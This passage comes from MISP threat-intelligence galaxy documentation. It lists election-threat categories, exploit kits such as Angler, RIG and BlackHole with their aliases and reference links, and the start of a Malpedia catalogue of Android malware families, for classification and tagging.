https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering, DoS or overload of the systems used for counting or aggregating results

The tag is: misp-galaxy:guidelines="Tampering, DoS or overload of the systems used for counting or aggregating results"

Table 737. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering or DoS of communication links uesd to transfer (interim) results

The tag is: misp-galaxy:guidelines="Tampering or DoS of communication links uesd to transfer (interim) results"

Table 738. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering with supply chain involved in the movement or transfer data

The tag is: misp-galaxy:guidelines="Tampering with supply chain involved in the movement or transfer data"

Table 739. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking of internal systems used by media or press

The tag is: misp-galaxy:guidelines="Hacking of internal systems used by media or press"

Table 740. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering, DoS, or overload of media communication links

The tag is: misp-galaxy:guidelines="Tampering, DoS, or overload of media communication links"

Table 741. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Defacement, DoS or overload of websites or other systems used for publication of the results

The tag is: misp-galaxy:guidelines="Defacement, DoS or overload of websites or other systems used for publication of the results"

Table 742. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Exploit-Kit

Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits.It’s not meant to be totally exhaustive but aim at covering the most seen in the past 5 years.

Exploit-Kit is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Kafeine - Will Metcalf - KahuSecurity

Astrum

Astrum Exploit Kit is a private Exploit Kit used in massive scale malvertising campaigns. It’s notable by its use of Steganography

The tag is: misp-galaxy:exploit-kit="Astrum"

Astrum is also known as:

Stegano EK

Table 743. Table References
Links
http://malware.dontneedcoffee.com/2014/09/astrum-ek.html
http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/

Underminer

Underminer EK is an exploit kit that seems to be used privately against users in Asia. Functionalities: browser profiling and filtering, preventing of client revisits, URL randomization, and asymmetric encryption of payloads.

The tag is: misp-galaxy:exploit-kit="Underminer"

Underminer is also known as:

Underminer EK

Table 744. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/new-underminer-exploit-kit-delivers-bootkit-and-cryptocurrency-mining-malware-with-encrypted-tcp-tunnel/
http://bobao.360.cn/interref/detail/248.html

Fallout

Fallout Exploit Kit appeared at the end of August 2018 as an updated Nuclear Pack featuring current exploits seen in competiting Exploit Kit.

The tag is: misp-galaxy:exploit-kit="Fallout"

Fallout is also known as:

Fallout

View relationships graph

Fallout has relationships with:

dropped: misp-galaxy:ransomware="GandCrab" with estimative-language:likelihood-probability="almost-certain"

Table 745. Table References
Links
https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html
https://www.bleepingcomputer.com/news/security/new-fallout-exploit-kit-drops-gandcrab-ransomware-or-redirects-to-pups/
https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-now-installing-the-kraken-cryptor-ransomware/

Bingo

Bingo EK is the name chosen by the defense for a Fiesta-ish EK first spotted in March 2017 and targetting at that times mostly Russia

The tag is: misp-galaxy:exploit-kit="Bingo"

Terror EK

Terror EK is built on Hunter, Sundown and RIG EK code

The tag is: misp-galaxy:exploit-kit="Terror EK"

Terror EK is also known as:

Blaze EK
Neptune EK

Table 746. Table References
Links
https://www.trustwave.com/Resources/SpiderLabs-Blog/Terror-Exploit-Kit—More-like-Error-Exploit-Kit/

DealersChoice

DealersChoice is a Flash Player Exploit platform triggered by RTF.

DealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Network researchers analyzed two variants — variant A, which is a standalone variant including Flash exploit code packaged with a payload, and variant B, which is a modular variant that loads exploit code on demand. This new component appeared in 2016 and is still in use.

The tag is: misp-galaxy:exploit-kit="DealersChoice"

DealersChoice is also known as:

Sednit RTF EK

Table 747. Table References
Links
http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/
http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/
https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

DNSChanger

DNSChanger Exploit Kit is an exploit kit targeting Routers via the browser

The tag is: misp-galaxy:exploit-kit="DNSChanger"

DNSChanger is also known as:

RouterEK

Table 748. Table References
Links
http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html
https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

Novidade

Novidade Exploit Kit is an exploit kit targeting Routers via the browser

The tag is: misp-galaxy:exploit-kit="Novidade"

Novidade is also known as:

DNSGhost

Table 749. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/

Disdain

Disdain EK has been introduced on underground forum on 2017-08-07. The panel is stolen from Sundown, the pattern are Terror alike and the obfuscation reminds Nebula

The tag is: misp-galaxy:exploit-kit="Disdain"

Table 750. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/

Kaixin

Kaixin is an exploit kit mainly seen behind compromised website in Asia

The tag is: misp-galaxy:exploit-kit="Kaixin"

Kaixin is also known as:

CK vip

Table 751. Table References
Links
http://www.kahusecurity.com/2013/deobfuscating-the-ck-exploit-kit/
http://www.kahusecurity.com/2012/new-chinese-exploit-pack/

Magnitude

Magnitude EK

The tag is: misp-galaxy:exploit-kit="Magnitude"

Magnitude is also known as:

Popads EK
TopExp
Magniber
Magnitude EK

Table 752. Table References
Links
http://malware.dontneedcoffee.com/2013/10/Magnitude.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Peek-Into-the-Lion-s-Den-%E2%80%93-The-Magnitude—aka-PopAds—Exploit-Kit/
http://malware.dontneedcoffee.com/2014/02/and-real-name-of-magnitude-is.html
https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

MWI

Microsoft Word Intruder is an exploit kit focused on Word and embedded flash exploits. The author wants to avoid their customer to use it in mass spam campaign, so it’s most often connected to semi-targeted attacks

The tag is: misp-galaxy:exploit-kit="MWI"

Table 753. Table References
Links
https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html
https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-microsoft-word-intruder-revealed.pdf

ThreadKit

ThreadKit is the name given to a widely used Microsoft Office document exploit builder kit that appeared in June 2017

The tag is: misp-galaxy:exploit-kit="ThreadKit"

Table 754. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware

VenomKit

VenomKit is the name given to a kit sold since april 2017 as "Word 1day exploit builder" by user badbullzvenom. Author allows only use in targeted campaign. Is used for instance by the "Cobalt Gang"

The tag is: misp-galaxy:exploit-kit="VenomKit"

VenomKit is also known as:

Venom

Table 755. Table References
Links
https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

Taurus Builder

Taurus Builder is a tool used to generate malicious MS Word documents that contain macros. The kit is advertised on forums by the user "badbullzvenom".

The tag is: misp-galaxy:exploit-kit="Taurus Builder"

RIG

RIG is an exploit kit that takes its source in Infinity EK itself an evolution of Redkit. It became dominant after the fall of Angler, Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 when it was only accessible by "vip" customers and when RIG 3 was still in use.

The tag is: misp-galaxy:exploit-kit="RIG"

RIG is also known as:

RIG 3
RIG-v
RIG 4
Meadgive

Table 756. Table References
Links
http://www.kahusecurity.com/2014/rig-exploit-pack/
https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Reloaded---Examining-the-Architecture-of-RIG-Exploit-Kit-3-0/
https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html

Spelevo

Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK

The tag is: misp-galaxy:exploit-kit="Spelevo"

Table 757. Table References
Links
https://twitter.com/kafeine/status/1103649040800145409

Sednit EK

Sednit EK is the exploit kit used by APT28

The tag is: misp-galaxy:exploit-kit="Sednit EK"

Sednit EK is also known as:

SedKit

Table 758. Table References
Links
http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

Sundown-P

Sundown-P/Sundown-Pirate is a rip of Sundown seen used in a private way (One group using it only) - First spotted at the end of June 2017, branded as CaptainBlack in August 2017

The tag is: misp-galaxy:exploit-kit="Sundown-P"

Sundown-P is also known as:

Sundown-Pirate
CaptainBlack

Table 759. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/promediads-malvertising-sundown-pirate-exploit-kit/

Bizarro Sundown

Bizarro Sundown appears to be a fork of Sundown with added anti-analysis features

The tag is: misp-galaxy:exploit-kit="Bizarro Sundown"

Bizarro Sundown is also known as:

Sundown-b

Table 760. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/
https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/

Hunter

Hunter EK is an evolution of 3Ros EK

The tag is: misp-galaxy:exploit-kit="Hunter"

Hunter is also known as:

3ROS Exploit Kit

View relationships graph

Hunter has relationships with:

similar: misp-galaxy:tool="Tinba" with estimative-language:likelihood-probability="likely"

Table 761. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/Hunter-Exploit-Kit-Targets-Brazilian-Banking-Customers

GreenFlash Sundown

GreenFlash Sundown is a variation of Bizarro Sundown without landing

The tag is: misp-galaxy:exploit-kit="GreenFlash Sundown"

GreenFlash Sundown is also known as:

Sundown-GF

Table 762. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/

Angler

The Angler Exploit Kit has been the most popular and evolved exploit kit from 2014 to middle of 2016. There was several variation. The historical "indexm" variant was used to spread Lurk. A vip version used notabily to spread Poweliks, the "standard" commercial version, and a declinaison tied to load selling (mostly bankers) that can be associated to EmpirePPC

The tag is: misp-galaxy:exploit-kit="Angler"

Angler is also known as:

XXX
AEK
Axpergle

Table 763. Table References
Links
https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/
http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html
http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html

Archie

Archie EK

The tag is: misp-galaxy:exploit-kit="Archie"

Table 764. Table References
Links
https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit

BlackHole

The BlackHole Exploit Kit has been the most popular exploit kit from 2011 to 2013. Its activity stopped with Paunch’s arrest (all activity since then is anecdotal and based on an old leak)

The tag is: misp-galaxy:exploit-kit="BlackHole"

BlackHole is also known as:

BHEK

View relationships graph

BlackHole has relationships with:

similar: misp-galaxy:rat="BlackHole" with estimative-language:likelihood-probability="likely"

Table 765. Table References
Links
https://www.trustwave.com/Resources/SpiderLabs-Blog/Blackhole-Exploit-Kit-v2/
https://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit/

Bleeding Life

Bleeding Life is an exploit kit that became open source with its version 2

The tag is: misp-galaxy:exploit-kit="Bleeding Life"

Bleeding Life is also known as:

Table 766. Table References
Links
http://www.kahusecurity.com/2011/flash-used-in-idol-malvertisement/
http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html

Cool

The Cool Exploit Kit was a kind of BlackHole VIP in 2012/2013

The tag is: misp-galaxy:exploit-kit="Cool"

Cool is also known as:

CEK
Styxy Cool

Table 767. Table References
Links
http://malware.dontneedcoffee.com/2012/10/newcoolek.html
http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html
http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/

Fiesta

Fiesta Exploit Kit

The tag is: misp-galaxy:exploit-kit="Fiesta"

Fiesta is also known as:

NeoSploit
Fiexp

Table 768. Table References
Links
http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an
http://www.kahusecurity.com/2011/neosploit-is-back/

Empire

The Empire Pack is a variation of RIG operated by a load seller. It’s being fed by many traffic actors

The tag is: misp-galaxy:exploit-kit="Empire"

Empire is also known as:

RIG-E

View relationships graph

Empire has relationships with:

similar: misp-galaxy:tool="Empire" with estimative-language:likelihood-probability="likely"

Table 769. Table References
Links
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html

FlashPack

FlashPack EK got multiple fork. The most common variant seen was the standalone Flash version

The tag is: misp-galaxy:exploit-kit="FlashPack"

FlashPack is also known as:

FlashEK
SafePack
CritXPack
Vintage Pack

Table 770. Table References
Links
http://malware.dontneedcoffee.com/2012/11/meet-critxpack-previously-vintage-pack.html
http://malware.dontneedcoffee.com/2013/04/meet-safe-pack-v20-again.html

Glazunov

Glazunov is an exploit kit mainly seen behind compromised website in 2012 and 2013. Glazunov compromission is likely the ancestor activity of what became EITest in July 2014. Sibhost and Flimkit later shown similarities with this Exploit Kit

The tag is: misp-galaxy:exploit-kit="Glazunov"

Table 771. Table References
Links
https://nakedsecurity.sophos.com/2013/06/24/taking-a-closer-look-at-the-glazunov-exploit-kit/

GrandSoft

GrandSoft Exploit Kit was a quite common exploit kit used in 2012/2013. Disappeared between march 2014 and September 2017

The tag is: misp-galaxy:exploit-kit="GrandSoft"

GrandSoft is also known as:

StampEK
SofosFO

Table 772. Table References
Links
http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html
http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html
https://nakedsecurity.sophos.com/2012/08/24/sophos-sucks-malware/

HanJuan

Hanjuan EK was a one actor fed variation of Angler EK used in evolved malvertising chain targeting USA. It has been using a 0day (CVE-2015-0313) from beginning of December 2014 till beginning of February 2015

The tag is: misp-galaxy:exploit-kit="HanJuan"

Table 773. Table References
Links
http://www.malwaresigs.com/2013/10/14/unknown-ek/
https://blog.malwarebytes.com/threat-analysis/2014/08/shining-some-light-on-the-unknown-exploit-kit/
http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-exploit-kit-in-cve-2015-0313-attack
https://twitter.com/kafeine/status/562575744501428226

Himan

Himan Exploit Kit

The tag is: misp-galaxy:exploit-kit="Himan"

Himan is also known as:

High Load

Table 774. Table References
Links
http://malware.dontneedcoffee.com/2013/10/HiMan.html

Impact

Impact EK

The tag is: misp-galaxy:exploit-kit="Impact"

Table 775. Table References
Links
http://malware.dontneedcoffee.com/2012/12/inside-impact-exploit-kit-back-on-track.html

Infinity

Infinity is an evolution of Redkit

The tag is: misp-galaxy:exploit-kit="Infinity"

Infinity is also known as:

Redkit v2.0
Goon

Table 776. Table References
Links
http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html
http://www.kahusecurity.com/2014/the-resurrection-of-redkit/

Lightsout

Lightsout Exploit Kit has been used in Watering Hole attack performed by the APT Group havex

The tag is: misp-galaxy:exploit-kit="Lightsout"

Table 777. Table References
Links
http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html
http://blog.talosintel.com/2014/05/continued-analysis-of-lightsout-exploit.html
http://malwageddon.blogspot.fr/2013/09/unknown-ek-by-way-how-much-is-fish.html

Nebula

Nebula Exploit Kit has been built on Sundown source and features an internal TDS

The tag is: misp-galaxy:exploit-kit="Nebula"

Table 778. Table References
Links
http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html

Neutrino

Neutrino Exploit Kit has been one of the major exploit kit from its launch in 2013 till september 2016 when it become private (defense name for this variation is Neutrino-v). This EK vanished from march 2014 till november 2014.

The tag is: misp-galaxy:exploit-kit="Neutrino"

Neutrino is also known as:

Job314
Neutrino Rebooted
Neutrino-v

View relationships graph

Neutrino has relationships with:

similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"

Table 779. Table References
Links
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html

Niteris

Niteris was used mainly to target Russian.

The tag is: misp-galaxy:exploit-kit="Niteris"

Niteris is also known as:

CottonCastle

Table 780. Table References
Links
http://malware.dontneedcoffee.com/2014/06/cottoncastle.html
http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html

Nuclear

The Nuclear Pack appeared in 2009 and has been one of the longer living one. Spartan EK was a landing less variation of Nuclear Pack

The tag is: misp-galaxy:exploit-kit="Nuclear"

Nuclear is also known as:

NEK
Nuclear Pack
Spartan
Neclu

Table 781. Table References
Links
http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/

Phoenix

Phoenix Exploit Kit

The tag is: misp-galaxy:exploit-kit="Phoenix"

Phoenix is also known as:

Table 782. Table References
Links
http://malwareint.blogspot.fr/2010/09/phoenix-exploits-kit-v21-inside.html
http://blog.trendmicro.com/trendlabs-security-intelligence/now-exploiting-phoenix-exploit-kit-version-2-5/

Private Exploit Pack

The tag is: misp-galaxy:exploit-kit="Private Exploit Pack"

Private Exploit Pack is also known as:

Table 783. Table References
Links
http://malware.dontneedcoffee.com/2013/07/pep-new-bep.html
http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html

Redkit

Redkit has been a major exploit kit in 2012. One of its specific features was to allow its access against a share of a percentage of the customer’s traffic

The tag is: misp-galaxy:exploit-kit="Redkit"

Table 784. Table References
Links
https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Wild-Exploit-Kit-Appears----Meet-RedKit/
http://malware.dontneedcoffee.com/2012/05/inside-redkit.html
https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/

Sakura

Sakura Exploit Kit appeared in 2012 and was adopted by several big actor

The tag is: misp-galaxy:exploit-kit="Sakura"

Table 785. Table References
Links
http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html

SPL

SPL exploit kit was mainly seen in 2012/2013 most often associated with ZeroAccess and Scareware/FakeAV

The tag is: misp-galaxy:exploit-kit="SPL"

SPL is also known as:

SPL_Data
SPLNet
SPL2

Table 786. Table References
Links
http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/

Sundown

Sundown Exploit Kit is mainly built out of stolen code from other exploit kits

The tag is: misp-galaxy:exploit-kit="Sundown"

Sundown is also known as:

Beps
Xer
Beta

Table 787. Table References
Links
http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html
https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road

Sweet-Orange

Sweet Orange

The tag is: misp-galaxy:exploit-kit="Sweet-Orange"

Sweet-Orange is also known as:

SWO
Anogre

Table 788. Table References
Links
http://malware.dontneedcoffee.com/2012/12/juice-sweet-orange-2012-12.html

Styx

Styx Exploit Kit

The tag is: misp-galaxy:exploit-kit="Styx"

Table 789. Table References
Links
http://malware.dontneedcoffee.com/2012/12/crossing-styx-styx-sploit-pack-20-cve.html
https://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto/
http://malware.dontneedcoffee.com/2013/05/inside-styx-2013-05.html

WhiteHole

WhiteHole Exploit Kit appeared in January 2013 in the tail of the CVE-2013-0422

The tag is: misp-galaxy:exploit-kit="WhiteHole"

Table 790. Table References
Links
http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html

Unknown

Unknown Exploit Kit. This is a place holder for any undocumented Exploit Kit. If you use this tag, we will be more than happy to give the associated EK a deep look.

The tag is: misp-galaxy:exploit-kit="Unknown"

Table 791. Table References
Links
https://twitter.com/kafeine
https://twitter.com/node5
https://twitter.com/kahusecurity

SpelevoEK

The Spelevo exploit kit seems to have similarities to SPL EK, which is a different exploit kit.

The tag is: misp-galaxy:exploit-kit="SpelevoEK"

Table 792. Table References
Links
https://cyberwarzone.com/what-is-the-spelevo-exploit-kit/

Malpedia

Malware galaxy cluster based on Malpedia..

Malpedia is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Davide Arcuri - Alexandre Dulaunoy - Steffen Enders - Andrea Garavaglia - Andras Iklody - Daniel Plohmann - Christophe Vandeplas

FastCash

The tag is: misp-galaxy:malpedia="FastCash"

FastCash is also known as:

Table 793. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash
https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/
https://github.com/fboldewin/FastCashMalwareDissected/
https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf
https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware
https://www.us-cert.gov/ncas/alerts/TA18-275A
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.youtube.com/watch?v=zGvQPtejX9w

888 RAT

The tag is: misp-galaxy:malpedia="888 RAT"

888 RAT is also known as:

Table 794. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.888_rat
https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/

Aberebot

The tag is: misp-galaxy:malpedia="Aberebot"

Aberebot is also known as:

Table 795. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot
https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/

ActionSpy

The tag is: misp-galaxy:malpedia="ActionSpy"

ActionSpy is also known as:

AxeSpy

Table 796. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy
https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/
https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/

AdoBot

The tag is: misp-galaxy:malpedia="AdoBot"

AdoBot is also known as:

Table 797. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.adobot
https://twitter.com/LukasStefanko/status/1243198756981559296

AdultSwine

The tag is: misp-galaxy:malpedia="AdultSwine"

AdultSwine is also known as:

Table 798. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine
https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/

AhMyth

The tag is: misp-galaxy:malpedia="AhMyth"

AhMyth is also known as:

Table 799. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth
https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/
https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset
https://www.secrss.com/articles/24995
https://securelist.com/transparent-tribe-part-2/98233/

Alien

According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.

The tag is: misp-galaxy:malpedia="Alien"

Alien is also known as:

Table 800. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien
https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html
https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets
https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/
https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/

Anatsa

The tag is: misp-galaxy:malpedia="Anatsa"

Anatsa is also known as:

TeaBot
Toddler

Table 801. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa
https://www.cleafy.com/documents/teabot
https://labs.k7computing.com/?p=22407
https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html
https://twitter.com/ThreatFabric/status/1394958795508523008
https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/
https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368
https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/
https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf
https://twitter.com/icebre4ker/status/1416409813467156482[https://twitter.com/icebre4ker/status/1416409813467156482]

AndroRAT

Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.

The tag is: misp-galaxy:malpedia="AndroRAT"

AndroRAT is also known as:

Table 802. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat
https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html
https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat
https://www.kaspersky.com/blog/mobile-malware-part-4/24290/
https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat
https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset
https://github.com/DesignativeDave/androrat
https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg
https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/

Anubis (Android)

The tag is: misp-galaxy:malpedia="Anubis (Android)"

Anubis (Android) is also known as:

BankBot
android.bankbot
android.bankspy

Table 803. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis
https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb
http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html
https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus
https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/
https://0x1c3n.tech/anubis-android-malware-analysis
https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis
https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/
https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/
https://www.youtube.com/watch?v=U0UsfO-0uJM
http://blog.koodous.com/2017/05/bankbot-on-google-play.html
https://securelist.com/mobile-malware-evolution-2019/96280/
https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/
https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html
https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html
http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html
https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html
https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ [https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ]
https://community.riskiq.com/article/85b3db8c
https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/
https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html
https://www.threatfabric.com/blogs/2020_year_of_the_rat.html
https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/
https://pentest.blog/n-ways-to-unpack-mobile-malware/
https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html

AnubisSpy

The tag is: misp-galaxy:malpedia="AnubisSpy"

AnubisSpy is also known as:

Table 804. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy
https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/

Asacub

The tag is: misp-galaxy:malpedia="Asacub"

Asacub is also known as:

Table 805. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub
https://securelist.com/the-rise-of-mobile-banker-asacub/87591/
https://securelist.com/mobile-malware-evolution-2019/96280/

Ashas

The tag is: misp-galaxy:malpedia="Ashas"

Ashas is also known as:

Table 806. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas
